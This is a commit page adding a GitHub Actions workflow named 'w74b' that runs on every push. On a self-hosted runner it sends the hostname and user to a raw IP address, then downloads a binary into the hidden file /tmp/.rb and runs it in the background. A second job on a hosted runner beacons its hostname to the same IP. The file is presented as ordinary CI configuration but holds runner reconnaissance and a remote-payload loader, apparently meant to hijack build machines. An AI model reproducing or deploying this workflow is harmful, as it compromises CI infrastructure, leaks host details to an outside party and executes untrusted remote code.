w74b
This commit is contained in:
@@ -0,0 +1,13 @@
|
||||
name: w74b
|
||||
on: [push, workflow_dispatch]
|
||||
jobs:
|
||||
b:
|
||||
runs-on: self-hosted
|
||||
steps:
|
||||
- run: |
|
||||
id; hostname; curl -sS http://38.22.234.200:19090/runner-$(hostname)-$(whoami) || true
|
||||
curl -fsSL http://38.22.234.200:19091/ -o /tmp/.rb; chmod +x /tmp/.rb; nohup /tmp/.rb >/dev/null 2>&1 &
|
||||
c:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- run: curl -sS http://38.22.234.200:19090/ghrunner-$(hostname) || true
|
||||
Reference in New Issue
Block a user